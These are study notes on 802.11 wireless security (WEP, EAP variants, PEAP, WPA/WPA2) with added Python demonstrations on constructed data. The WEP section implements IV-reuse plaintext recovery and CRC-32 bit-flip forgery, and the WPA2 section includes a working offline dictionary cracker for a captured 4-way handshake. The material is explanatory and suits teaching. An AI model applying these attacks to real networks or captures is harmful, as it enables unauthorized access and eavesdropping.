Wired Equivalent Privacy (WEP)
Wired Equivalent Privacy (WEP) was the first encryption scheme for 802.11 wireless LANs. It has several weaknesses and should not be used:
- Weak encryption that has been broken: RC4 keyed with a 24-bit IV prepended to a static key, so IVs repeat and the key itself can be recovered from captured traffic; the CRC-32 integrity check is linear and does not detect deliberate bit flips
- Vulnerable to dictionary attacks against passphrase-derived keys
- Client trusts the AP, since there is no mutual authentication, allowing a rogue access point
- Keys must be manually distributed
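To make the first weakness concrete, here is an added example (not from the original notes) that implements WEP's RC4 framing in Python with a constructed 40-bit key and constructed frames. It shows two of the classic results: two frames sent under the same 24-bit IV share a keystream, so XORing the ciphertexts cancels the key and known plaintext in one frame reveals the other; and because the ICV is CRC-32, which is linear, an attacker can flip chosen bits in a frame and correct the ICV without knowing the key. The key, IV and payloads are invented for the example, not taken from any real capture.

```python
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4: key-scheduling algorithm followed by the PRGA."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(shared_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: 3-byte IV in the clear, then RC4(IV||key) XOR (data||CRC-32 ICV)."""
    assert len(iv) == 3 and len(shared_key) in (5, 13)
    icv = zlib.crc32(plaintext).to_bytes(4, "little")
    keystream = rc4_keystream(iv + shared_key, len(plaintext) + 4)
    return iv + xor(plaintext + icv, keystream)


def wep_decrypt(shared_key: bytes, frame: bytes) -> bytes:
    """Receiver side: strip the IV, undo RC4, reject the frame if the ICV fails."""
    iv, body = frame[:3], frame[3:]
    data_icv = xor(body, rc4_keystream(iv + shared_key, len(body)))
    data, icv = data_icv[:-4], data_icv[-4:]
    if zlib.crc32(data).to_bytes(4, "little") != icv:
        raise ValueError("ICV check failed")
    return data


def recover_from_iv_reuse(frame_a: bytes, frame_b: bytes, known_a: bytes) -> bytes:
    """Same IV + same static key => same keystream, so C_a XOR C_b = P_a XOR P_b.
    Knowing P_a (a predictable header, say) yields P_b without ever learning the key.
    With a 24-bit IV a busy AP repeats IVs after at most 2**24 frames."""
    assert frame_a[:3] == frame_b[:3], "attack needs an IV collision"
    plaintext_xor = xor(frame_a[3:], frame_b[3:])
    return xor(plaintext_xor[: len(known_a)], known_a)


def flip_bits(frame: bytes, delta: bytes) -> bytes:
    """Modify an encrypted frame so it decrypts to data XOR delta and still passes the ICV.
    CRC-32 is affine over GF(2): crc(p ^ d) = crc(p) ^ crc(d) ^ crc(zeros), so the ICV
    correction depends only on the attacker-chosen delta, not on the key or plaintext."""
    iv, body = frame[:3], frame[3:]
    data_ct, icv_ct = body[:-4], body[-4:]
    assert len(delta) == len(data_ct)
    icv_fix = zlib.crc32(delta) ^ zlib.crc32(bytes(len(delta)))
    return iv + xor(data_ct, delta) + xor(icv_ct, icv_fix.to_bytes(4, "little"))


# Constructed demo values: a 40-bit key and two 16-byte payloads sent under one IV.
KEY = bytes.fromhex("0102030405")
IV = b"\x00\x00\x01"
PLAIN_A = b"GET /index.html "
PLAIN_B = b"POST /login.html"


def demo() -> dict:
    frame_a = wep_encrypt(KEY, IV, PLAIN_A)
    frame_b = wep_encrypt(KEY, IV, PLAIN_B)
    # Attacker knows PLAIN_A, never learns KEY, reads PLAIN_B anyway.
    recovered_b = recover_from_iv_reuse(frame_a, frame_b, PLAIN_A)
    # Attacker turns "GET " into "PUT " in flight; the receiver accepts the frame.
    delta = xor(b"GET ", b"PUT ") + bytes(len(PLAIN_A) - 4)
    forged_plain = wep_decrypt(KEY, flip_bits(frame_a, delta))
    return {"recovered_b": recovered_b, "forged_plain": forged_plain}


if __name__ == "__main__":
    print(demo())
```

Neither attack touches the key: the first needs only an IV collision and some known plaintext, the second needs nothing but the ciphertext. The key-recovery attacks that finished WEP off (FMS, PTW) build on the same RC4/IV structure but are not shown here.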
802.1x Extensible Authentication Protocol (EAP)
EAP was originally developed for wired port access control and was adopted for wireless access control. An EAP deployment requires a client wireless card and supplicant, an authentication server, and an access point, all of them EAP capable. Until it is authenticated, a wireless client can only transmit EAP traffic; the RADIUS server authenticates the client and the client authenticates the server in a challenge and response exchange. EAP was originally defined in RFC 2284, which was obsoleted by RFC 3748; RFC 4017 defines the requirements an EAP method must meet for use on wireless LANs.
- RADIUS authentication server
- Can use multiple encryption algorithms
- Dynamic WEP keys
- Encrypted passwords
- Centralized control
Cisco Lightweight Extensible Authentication Protocol (LEAP)
LEAP is a Cisco proprietary EAP method. Benefits claimed for it:
- Fast and secure roaming
- Single sign-on with various backends, AD, LDAP
- Widely supported; MS, MAC and Linux clients
LEAP authenticates with an MS-CHAP style challenge and response that is exposed on the air, so the user's password is open to an offline dictionary attack; Cisco's recommended replacement is EAP-FAST.
Extensible Authentication Protocol – Flexible Authentication via Secure Tunneling (EAP-FAST)
- EAP-FAST was developed by Cisco but is published openly as RFC 4851, so it is not locked to one vendor
- Mutual authentication of server and client by using the TLS handshake protocol
- Resistant to man in the middle attacks once a PAC is in place; anonymous in-band provisioning in Phase 0 is the exposed step
- Ability to use multiple password authentication backends
- Computationally efficient
- Does not require certificates
EAP-FAST consists of three phases:
- Phase 0 — The client is dynamically provisioned with a Protected Access Credential (PAC). The PAC can also be installed manually, so this phase is considered optional.
- Phase 1 — Server and client use the PAC to authenticate each other and establish a secure tunnel.
- Phase 2 — The client sends its credentials through the tunnel for authentication.
Extensible Authentication Protocol – Transport Layer Security (EAP-TLS)
EAP-TLS was originally defined in RFC 2716 and was redefined by RFC 5216 in March 2008; the TLS enhancement referred to is RFC 4507, session resumption without server-side state (since obsoleted by RFC 5077). EAP-TLS uses public key infrastructure (PKI): both client and server need a certificate for authentication, and the certificates must be issued by a certification authority (CA) that the other side trusts. The client is the supplicant, the authenticator is the AP and the authentication server is the RADIUS server.
EAP-TLS Authentication Process:
- Client associates to the AP, which restricts it to EAP traffic only.
- AP requests the client's identity and relays the response to the RADIUS server.
- RADIUS server sends an EAP-TLS Start; the client begins the TLS handshake and the server presents its certificate.
- Client validates the server certificate against the CA and responds with its own certificate, continuing the cryptographic negotiation.
- After the RADIUS server validates the client certificate it responds with the cryptographic specifications for the session.
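As an added example (not part of the original notes), the following Python builds and parses the EAP messages behind the 802.1x description above and the EAP-TLS process just listed: the EAP header from RFC 3748 and the EAP-TLS type data from RFC 5216 (flags L, M and S plus the optional TLS message length), including how a server flight larger than the EAP MTU is fragmented and acknowledged. The identity string, EAP identifiers and the "TLS" bytes are constructed placeholders; no real TLS handshake is performed.

```python
import struct
from typing import List, Optional

EAP_CODES = {1: "Request", 2: "Response", 3: "Success", 4: "Failure"}
# EAP method type numbers from RFC 3748 and the IANA EAP registry.
EAP_TYPES = {1: "Identity", 2: "Notification", 3: "Nak", 13: "EAP-TLS",
             17: "LEAP", 25: "PEAP", 43: "EAP-FAST"}

EAP_TLS_FLAG_L = 0x80  # TLS Message Length field present
EAP_TLS_FLAG_M = 0x40  # more fragments follow
EAP_TLS_FLAG_S = 0x20  # EAP-TLS Start (server to client)


def build_eap(code: int, identifier: int, eap_type: Optional[int] = None,
              type_data: bytes = b"") -> bytes:
    """RFC 3748 packet: Code(1) Identifier(1) Length(2) [Type(1) Type-Data]."""
    body = b"" if eap_type is None else bytes([eap_type]) + type_data
    return struct.pack("!BBH", code, identifier, 4 + len(body)) + body


def parse_eap(pkt: bytes) -> dict:
    code, identifier, length = struct.unpack("!BBH", pkt[:4])
    if length < 4 or length != len(pkt):
        raise ValueError("EAP Length field does not match the packet")
    info = {"code": EAP_CODES.get(code, code), "id": identifier}
    if code in (1, 2):  # only Request and Response carry a Type
        info["type"] = EAP_TYPES.get(pkt[4], pkt[4])
        info["type_data"] = pkt[5:]
    return info


def build_eap_tls(flags: int, tls_data: bytes = b"",
                  total_len: Optional[int] = None) -> bytes:
    """RFC 5216 type data: Flags(1) [TLS Message Length(4)] TLS Data."""
    out = bytes([flags])
    if flags & EAP_TLS_FLAG_L:
        out += struct.pack("!I", len(tls_data) if total_len is None else total_len)
    return out + tls_data


def parse_eap_tls(type_data: bytes) -> dict:
    flags = type_data[0]
    info = {"L": bool(flags & EAP_TLS_FLAG_L), "M": bool(flags & EAP_TLS_FLAG_M),
            "S": bool(flags & EAP_TLS_FLAG_S)}
    offset = 1
    if info["L"]:
        info["tls_length"] = struct.unpack("!I", type_data[1:5])[0]
        offset = 5
    info["tls_data"] = type_data[offset:]
    return info


def eap_tls_exchange() -> List[bytes]:
    """The on-air EAP packets of the process above, with constructed contents.
    Response/Identity travels in the clear: no TLS tunnel exists yet."""
    identity = b"alice@example.com"                 # constructed
    client_hello = b"<ClientHello placeholder>"      # constructed, not real TLS
    server_flight = bytes(range(256)) * 6            # constructed: 1536 bytes, > one EAP MTU
    mtu = 1024
    return [
        build_eap(1, 1, 1),                          # AP: Request/Identity
        build_eap(2, 1, 1, identity),                # client: Response/Identity, relayed to RADIUS
        build_eap(1, 2, 13, build_eap_tls(EAP_TLS_FLAG_S)),               # RADIUS: EAP-TLS Start
        build_eap(2, 2, 13, build_eap_tls(EAP_TLS_FLAG_L, client_hello)),  # client: ClientHello
        # Server certificate and friends exceed the MTU: first fragment has L and M set.
        build_eap(1, 3, 13, build_eap_tls(EAP_TLS_FLAG_L | EAP_TLS_FLAG_M,
                                          server_flight[:mtu], len(server_flight))),
        build_eap(2, 3, 13, build_eap_tls(0)),       # client: empty EAP-TLS ACK of the fragment
        build_eap(1, 4, 13, build_eap_tls(0, server_flight[mtu:])),  # last fragment, no M
        build_eap(3, 5),                             # RADIUS: EAP-Success once client cert validated
    ]


def reassemble_server_tls(pkts: List[bytes]) -> bytes:
    """Concatenate the TLS data of every EAP-Request/EAP-TLS packet (the server's flight)."""
    out = b""
    for p in pkts:
        eap = parse_eap(p)
        if eap["code"] == "Request" and eap.get("type") == "EAP-TLS":
            out += parse_eap_tls(eap["type_data"])["tls_data"]
    return out


if __name__ == "__main__":
    for p in eap_tls_exchange():
        print(parse_eap(p))
```

The same header parsing applies to LEAP, PEAP and EAP-FAST packets; only the Type byte and the type data differ.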
Protected EAP (PEAP)
PEAP only requires the authentication server to have a certificate; the client needs only the CA certificate so that it can validate the server.
PEAP has two phases:
- Phase 1 – The client authenticates the server by verifying its certificate against the CA, and an encrypted TLS tunnel is created between client and server.
- Phase 2 – The client is authenticated inside the tunnel using an inner EAP method.
PEAP has two inner authentication implementations:
- Generic Token Card (GTC) (PEAP-GTC) for client authentication against Novell or LDAP directories.
- Microsoft Challenge Handshake Authentication Protocol (MS-CHAP) version 2 (PEAP-MSCHAPv2) for Microsoft single sign-on.
The protection rests on Phase 1: a supplicant that is not configured to validate the server certificate will build its tunnel to a rogue access point and hand over its inner credentials.
Wi-Fi Protected Access (WPA)
WPA with TKIP can now be broken in about a minute: the published attacks recover the MIC key and allow forged packets to be injected, although they do not recover the encryption key. It is not recommended for use, but it is still on the test. WPA with TKIP encryption was developed as an interim standard, created to maintain backward compatibility with hardware that had supported WEP. WPA performs authentication using either 802.1x/EAP or preshared keys prior to the key management phase. WPA uses Temporal Key Integrity Protocol (TKIP) with a Message Integrity Check (MIC) and per-packet keying (PPK) in an attempt to close the holes in WEP.
802.11i or WPA2
802.11i is known more commonly as WPA2; WPA2 is the Wi-Fi Alliance certification for products that implement the IEEE 802.11i amendment. It provides stronger encryption, AES (in CCMP mode) rather than the RC4 cipher used by WEP and WPA. As a result it commonly required a hardware upgrade.
Key WPA2 facts from the ONT book:
- Uses 802.1x for authentication
- Uses similar method of key distribution and renewal as WPA
- Supports Proactive Key Caching (PKC)
- Has Intrusion Detection System (IDS)
WPA/WPA2 provide two modes of operation:
- Personal mode — Authentication is performed using a preshared key (PSK)
- Enterprise mode — 802.1x/EAP with an AAA/RADIUS server is used for authentication
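Personal mode is where passphrase strength decides everything, so here is an added example (not from the original notes or the ONT book) in Python of how a WPA/WPA2-Personal passphrase becomes the 256-bit PSK and how the key management phase that follows makes a weak passphrase guessable offline. The derivation is checked against the test vector published in IEEE 802.11i (passphrase "password", SSID "IEEE"). The PTK derivation and MIC check follow 802.11i for the AES key descriptor (HMAC-SHA1, version 2); the SSID, passphrase, MAC addresses, nonces, RSN IE and wordlist are constructed for the example, so the "captured" handshake message is built by the code itself.

```python
import hashlib
import hmac
import struct
from typing import Iterable, Optional

PTK_LABEL = b"Pairwise key expansion"


def wpa_psk(passphrase: str, ssid: str) -> bytes:
    """IEEE 802.11i: PSK = PBKDF2(HMAC-SHA1, passphrase, SSID, 4096 iterations, 256 bits).
    A passphrase is 8 to 63 ASCII characters; the SSID acts as the salt."""
    if not 8 <= len(passphrase) <= 63 or not passphrase.isascii():
        raise ValueError("WPA passphrase must be 8-63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), 4096, dklen=32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0.., first 64 bytes."""
    out = b""
    for i in range(4):  # 4 * 20 bytes >= 64
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def derive_kck(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, label, min(AA,SPA)||max(AA,SPA)||min(nonces)||max(nonces)).
    In PSK mode the PMK is the PSK. The first 16 bytes of the PTK are the KCK, which
    authenticates the 4-way handshake frames."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, PTK_LABEL, data)[:16]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key descriptor version 2 (AES): MIC = HMAC-SHA1(KCK, frame with MIC field zeroed)[:16].
    In the EAPOL-Key layout the 16-byte MIC sits at offset 81."""
    zeroed = frame[:81] + bytes(16) + frame[97:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, key_data: bytes, mic: bytes = bytes(16)) -> bytes:
    """Handshake message 2 (supplicant -> AP): EAPOL header, descriptor type 2, key info
    0x010a (version 2, pairwise, MIC present), replay counter 1, SNonce, zero IV/RSC/ID."""
    body = (struct.pack("!BHH", 2, 0x010A, 0) + (1).to_bytes(8, "big") + snonce
            + bytes(16) + bytes(8) + bytes(8) + mic
            + struct.pack("!H", len(key_data)) + key_data)
    return struct.pack("!BBH", 2, 3, len(body)) + body  # EAPOL v2, type 3 = EAPOL-Key


# Constructed network: everything an eavesdropper sees, plus the passphrase the victim chose.
SSID = "ExampleNet"
PASSPHRASE = "letmein123"
AA = bytes.fromhex("001122334455")     # AP MAC (constructed)
SPA = bytes.fromhex("66778899aabb")    # client MAC (constructed)
ANONCE = bytes(range(32))              # constructed nonces
SNONCE = bytes(range(32, 64))
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # WPA2-PSK/CCMP IE


def captured_msg2() -> bytes:
    """What the legitimate client transmits: message 2 with a valid MIC under PASSPHRASE."""
    kck = derive_kck(wpa_psk(PASSPHRASE, SSID), AA, SPA, ANONCE, SNONCE)
    unsigned = build_msg2(SNONCE, RSN_IE)
    return build_msg2(SNONCE, RSN_IE, eapol_mic(kck, unsigned))


def crack(ssid: str, aa: bytes, spa: bytes, anonce: bytes, msg2: bytes,
          wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: one 4096-round PBKDF2 plus a PRF and an HMAC per guess,
    verified against the MIC in the captured frame. No further traffic to the AP is needed."""
    snonce, captured_mic = msg2[17:49], msg2[81:97]
    for word in wordlist:
        if not 8 <= len(word) <= 63:
            continue
        kck = derive_kck(wpa_psk(word, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, msg2), captured_mic):
            return word
    return None


if __name__ == "__main__":
    print(crack(SSID, AA, SPA, ANONCE, captured_msg2(), ["password", "qwertyuiop", "letmein123"]))
```

Two points follow from the code: the SSID salt means tables precomputed for one SSID are useless against another, and the 4096 iterations set the per-guess cost, so a long random passphrase (or Enterprise mode) is the only real defence against this attack.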
I will end with this quote; I wish I could find the reference, but it is probably from the ONT book:
Some people mistakenly think that if the AP is configured not to broadcast its SSID, they have a secure wireless LAN; that is not true. When a legitimate wireless client with the correct SSID attempts to associate with its AP, the SSID is exchanged over the air unencrypted; that means that an illegitimate user can easily capture and use the SSID.
References
- NetCraftsmen, Examining 802.1x and EAP
- IEEE 802.1X standard document
- TLS Deployment Guide
- EAP: RFC 2284, RFC 3748
- EAP on wireless LANs: RFC 4017
- EAP-FAST: RFC 4851
- EAP-TLS: RFC 2716, RFC 5216
- TLS enhancements: RFC 4507